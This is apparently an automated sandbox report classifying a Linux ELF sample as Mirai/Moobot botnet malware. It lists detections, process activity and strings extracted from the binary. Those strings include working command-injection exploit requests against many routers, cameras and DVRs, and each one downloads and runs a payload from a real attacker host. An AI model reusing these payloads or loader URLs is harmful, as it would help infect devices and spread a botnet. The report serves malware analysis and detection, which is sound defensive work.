Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
cN7jzEkjeq.elf

Overview

General Information

Sample name:cN7jzEkjeq.elf
renamed because original name is a hash value
Original sample name:39ef44ca87bbf9e1a01b12fd2ae3237b.elf
Analysis ID:1447656
MD5:39ef44ca87bbf9e1a01b12fd2ae3237b
SHA1:fadf4315ebeba07ba55bb1996eff32fb092f5532
SHA256:b059459fcc36d07e0747d85abf2488c558ca728dc4099b831064cfe4541d6704
Tags:32elfgafgytrenesas
Infos:

Detection

Mirai, Moobot
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Moobot
Contains symbols with names commonly found in malware
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Sets full permissions to files and/or directories
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1447656
Start date and time:2024-05-26 11:00:08 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 41s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:cN7jzEkjeq.elf
renamed because original name is a hash value
Original Sample Name:39ef44ca87bbf9e1a01b12fd2ae3237b.elf
Detection:MAL
Classification:mal92.troj.linELF@0/0@0/0
  • Skipping network analysis since amount of network traffic is too extensive
Command:/tmp/cN7jzEkjeq.elf
PID:5438
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:chmod: cannot access ''$'\377\177\360\373\377\177''bin/busybox'$'\177\310\373\377\177\350\373\377\177\034\374\377\177\270\260''A': No such file or directory
  • system is lnxubuntu20
  • cN7jzEkjeq.elf (PID: 5438, Parent: 5359, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/cN7jzEkjeq.elf
    • sh (PID: 5440, Parent: 5438, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/cN7jzEkjeq.elf bin/busybox; chmod 777 \\xff\\xf0\\xfb\\xffbin/busybox\\xc8\\xfb\\xff\\xe8\\xfb\\xff\\xfc\\xff\\xb8\\xb0A"
      • sh New Fork (PID: 5442, Parent: 5440)
      • rm (PID: 5442, Parent: 5440, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/busybox
      • sh New Fork (PID: 5443, Parent: 5440)
      • mkdir (PID: 5443, Parent: 5440, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin
      • sh New Fork (PID: 5444, Parent: 5440)
      • mv (PID: 5444, Parent: 5440, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /tmp/cN7jzEkjeq.elf bin/busybox
      • sh New Fork (PID: 5445, Parent: 5440)
      • chmod (PID: 5445, Parent: 5440, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 \\xff\\xf0\\xfb\\xffbin/busybox\\xc8\\xfb\\xff\\xe8\\xfb\\xff\\xfc\\xff\\xb8\\xb0A
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
MooBotNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot
SourceRuleDescriptionAuthorStrings
cN7jzEkjeq.elfJoeSecurity_MoobotYara detected MoobotJoe Security
    cN7jzEkjeq.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
      cN7jzEkjeq.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        cN7jzEkjeq.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
        • 0x1c10c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c120:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c134:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c148:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c15c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c170:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c184:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c198:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c1ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c1c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c1d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c1e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c1fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c210:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c224:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c238:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c24c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c260:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c274:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c288:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1c29c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        SourceRuleDescriptionAuthorStrings
        5468.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
          5468.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
            5468.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
            • 0x1c10c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1c120:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1c134:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1c148:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1c15c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1c170:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1c184:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1c198:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1c1ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1c1c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1c1d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1c1e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1c1fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1c210:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1c224:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1c238:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1c24c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1c260:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1c274:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1c288:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1c29c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            5464.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
              5464.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
                Click to see the 13 entries
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: cN7jzEkjeq.elfAvira: detected
                Source: cN7jzEkjeq.elfVirustotal: Detection: 57%Perma Link
                Source: cN7jzEkjeq.elfReversingLabs: Detection: 52%
                Source: cN7jzEkjeq.elfString: %7B%22hostname%22%3A%20%221%27wget%20http%3A%2F%2Fwoshishabi.zzy.rip%2Fmips%3B%20chmod%20777%20mips%3B%20.%2Fmips%20totolin.selfrep%3Becho%27%22%2C%20%22dhcpMtu%22%3A%20%221500%22%2C%20%22proto%22%3A%209%2C%20%22dnsMode%22%3A%20%220%22%2C%20%22ttlWay%22%3A%20%221%22%2C%20%22lcpEchoEnable%22%3A%20%221%22%2C%20%22clone%22%3A%20%220%22%2C%20%22cloneMac%22%3A%20%221C%3AF4%3A08%3A53%3A15%3A60%22%2C%20%22topicurl%22%3A%20%22setWanCfg%22%2C%20%22token%22%3A%20%229d48f879b6940d711cd1449c6f4b4186%22%7D
                Source: cN7jzEkjeq.elfString: %7B%22hostname%22%3A%20%221%27wget%20http%3A%2F%2Fwoshishabi.zzy.rip%2Fmips%3B%20chmod%20777%20mips%3B%20.%2Fmips%20totolin.selfrep%3Becho%27%22%2C%20%22dhcpMtu%22%3A%20%221500%22%2C%20%22proto%22%3A%209%2C%20%22dnsMode%22%3A%20%220%22%2C%20%22ttlWay%22%3A%20%221%22%2C%20%22lcpEchoEnable%22%3A%20%221%22%2C%20%22clone%22%3A%20%220%22%2C%20%22cloneMac%22%3A%20%221C%3AF4%3A08%3A53%3A15%3A60%22%2C%20%22topicurl%22%3A%20%22setWanCfg%22%2C%20%22token%22%3A%20%229d48f879b6940d711cd1449c6f4b4186%22%7DPOST /cgi-bin/cstecgi.cgi HTTP/1.1
                Source: cN7jzEkjeq.elfString found in binary or memory: http://0.0.0.0/bins/sora.mips;
                Source: cN7jzEkjeq.elfString found in binary or memory: http://104.244.74.231/jack5tr.selfrep.sh
                Source: cN7jzEkjeq.elfString found in binary or memory: http://104.244.74.231/mips
                Source: cN7jzEkjeq.elfString found in binary or memory: http://104.244.74.231/sora.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$
                Source: cN7jzEkjeq.elfString found in binary or memory: http://104.244.74.231/x86
                Source: cN7jzEkjeq.elfString found in binary or memory: http://purenetworks.com/HNAP1/
                Source: cN7jzEkjeq.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: cN7jzEkjeq.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: cN7jzEkjeq.elfString found in binary or memory: http://woshishabi.zzy.rip/wget.sh$
                Source: cN7jzEkjeq.elfString found in binary or memory: http://woshishabi.zzy.rip/x86

                System Summary

                barindex
                Source: cN7jzEkjeq.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: 5468.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: 5464.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: 5438.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: Process Memory Space: cN7jzEkjeq.elf PID: 5438, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: Process Memory Space: cN7jzEkjeq.elf PID: 5464, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: Process Memory Space: cN7jzEkjeq.elf PID: 5468, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: ELF static info symbol of initial sampleName: attack.c
                Source: ELF static info symbol of initial sampleName: attack_get_opt_int
                Source: ELF static info symbol of initial sampleName: attack_get_opt_ip
                Source: ELF static info symbol of initial sampleName: attack_init
                Source: ELF static info symbol of initial sampleName: attack_kill_all
                Source: ELF static info symbol of initial sampleName: attack_method_nudp
                Source: ELF static info symbol of initial sampleName: attack_method_stdhex
                Source: ELF static info symbol of initial sampleName: attack_method_tcp
                Source: ELF static info symbol of initial sampleName: attack_ongoing
                Source: ELF static info symbol of initial sampleName: attack_parse
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: asus_scanner_pid
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: asus_scanner_rawpkt
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: dlinkscanner_fake_time
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: dlinkscanner_rsck
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: dlinkscanner_scanner_pid
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: dlinkscanner_scanner_rawpkt
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: dlinkscanner_setup_connection
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: hexPayload
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: hnapscanner_fake_time
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: hnapscanner_rsck
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: hnapscanner_scanner_pid
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: hnapscanner_scanner_rawpkt
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: hnapscanner_setup_connection
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: huawei_scanner_pid
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: huawei_scanner_rawpkt
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: lblink_scanner_pid
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: lblink_scanner_rawpkt
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: linksys_scanner_pid
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: linksys_scanner_rawpkt
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: nuuo_scanner_pid
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: nuuo_scanner_rawpkt
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: realtekscanner_fake_time
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: realtekscanner_rsck
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: realtekscanner_scanner_pid
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: realtekscanner_scanner_rawpkt
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: realtekscanner_setup_connection
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: scanner_init
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: totolink_scanner_pid
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: totolink_scanner_rawpkt
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: tplink_scanner_pid
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: tplink_scanner_rawpkt
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: tr064_scanner_pid
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: tr064_scanner_rawpkt
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: tvt_scanner_pid
                Source: cN7jzEkjeq.elfELF static info symbol of initial sample: tvt_scanner_rawpkt
                Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.74.231/jack5tr.selfrep.sh+-O+vaicalon;chmod+777+*;sh+vaicalon+gpon.selfrep`&ipv=0
                Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.74.231/jack5tr.selfrep.sh+-O+anngu;chmod+777+*;sh+anngu+gpon.selfrep`&ipv=0
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://104.244.74.231/mips -O .0721; /bin/busybox chmod 777 .0721; ./.0721 huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: Initial sampleString containing 'busybox' found: /bin/busybox
                Source: Initial sampleString containing 'busybox' found: bin/busybox
                Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.74.231/jack5tr.selfrep.sh+-O+vaicalon;chmod+777+*;sh+vaicalon+gpon.selfrep`&ipv=0POST /GponForm/diag_Form?images/ HTTP/1.1
                Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.74.231/jack5tr.selfrep.sh+-O+anngu;chmod+777+*;sh+anngu+gpon.selfrep`&ipv=0POST /HNAP1/ HTTP/1.0
                Source: Initial sampleString containing 'busybox' found: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Ares.mpsl%3B+wget%20http%3A%2F%2F104.244.74.231%2Fmpsl%20-O%20.0721%3B%20chmod%20777%20.0721%3B%20.%2F.0721%20link.selfrep%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1h/bin/busybox/bin/watchdog/bin/systemdbin/busyboxbin/watchdogbin/systemdbinrm -rf && mkdir ; > && mv ; chmod 777 3f
                Source: Initial samplePotential command found: GET /device.rsp?opt=sys&cmd=_S_O_S_T_R_E_A_MAX_&mdb=sos&mdc=uname%20-a%3Bwget%20http%3A%2F%2F15.235.163.157%2Fjack5tr.selfrep.sh%20-O%20.072l%3Bsh%20.072l%20TBKDvR HTTP/1.1
                Source: Initial samplePotential command found: GET /ping.cgi?pingIpAddress=google.fr%3Bwget%20http%3A%2F%2F104.244.74.231%2Fmips%20-O%20.0721%3Bchmod%20777%20.0721%3B.%2F.0721 HTTP/1.1
                Source: Initial samplePotential command found: GET /login.cgi?cli=aa%20aa%27%3Bwget%20http%3A%2F%2F104.244.74.231%2Fjack5tr.selfrep.sh%20-O%20.072l%3Bsh%20.072l%20dlink%27%24 HTTP/1.1
                Source: Initial samplePotential command found: GET /
                Source: Initial samplePotential command found: GET /shell?cd%20%2Ftmp%3Brm%20-rf%20*%3Bwget%20104.244.74.231%2Fjack5tr.selfrep.sh%20-O%20.072l%3Bchmod%20777%20.072l%3Bsh%20.072l%20jaws HTTP/1.1
                Source: Initial samplePotential command found: GET /login.cgi?cli=aa%20aa%27%3Bwget%20http%3A%2F%2F104.244.74.231%2Fjack5tr.selfrep.sh%20-O%20.072l%3Bsh%20.072l%20dlink%27%24 HTTP/1.1
                Source: Initial samplePotential command found: GET /HEAD /POST /HTTP/1.1 404 Not FoundServer: Apache %d
                Source: Initial samplePotential command found: GET /boaform/admin/formPing?target_addr=;wget%20http://104.244.74.231/sora.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                Source: Initial samplePotential command found: GET /debugging_center_utils_.php?log=%3Bwget%20http%3A%2F%2Fwoshishabi.zzy.rip%2Fjack5tr.selfrep.sh%20-O-%20%7C%20sh%20nuuo HTTP/1.1
                Source: Initial samplePotential command found: GET /debugging_center_utils_.php?log=%3Bwget%20http%3A%2F%2Fwoshishabi.zzy.rip%2Fjack5tr.selfrep.sh%20-O-%20%7C%20sh%20nuuo HTTP/1.1w5q6he3dbrsgmclkiu4to18npavj702fPOST /picdesc.xml HTTP/1.1
                Source: Initial samplePotential command found: GET /index.php?s=/index/hink
                Source: Initial samplePotential command found: GET /%s HTTP/1.0
                Source: cN7jzEkjeq.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: 5468.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: 5464.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: 5438.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: Process Memory Space: cN7jzEkjeq.elf PID: 5438, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: Process Memory Space: cN7jzEkjeq.elf PID: 5464, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: Process Memory Space: cN7jzEkjeq.elf PID: 5468, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: classification engineClassification label: mal92.troj.linELF@0/0@0/0
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/5383/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/230/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/110/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/231/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/111/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/232/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/112/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/233/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/113/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/234/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/114/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/235/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/115/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/236/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/116/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/237/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/117/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/238/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/118/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/239/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/119/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/914/cmdlineJump to behavior
                Source: /tmp/cN7jzEkjeq.elf (PID: 5448)File opened: /proc/10/cmdlineJump to behavior
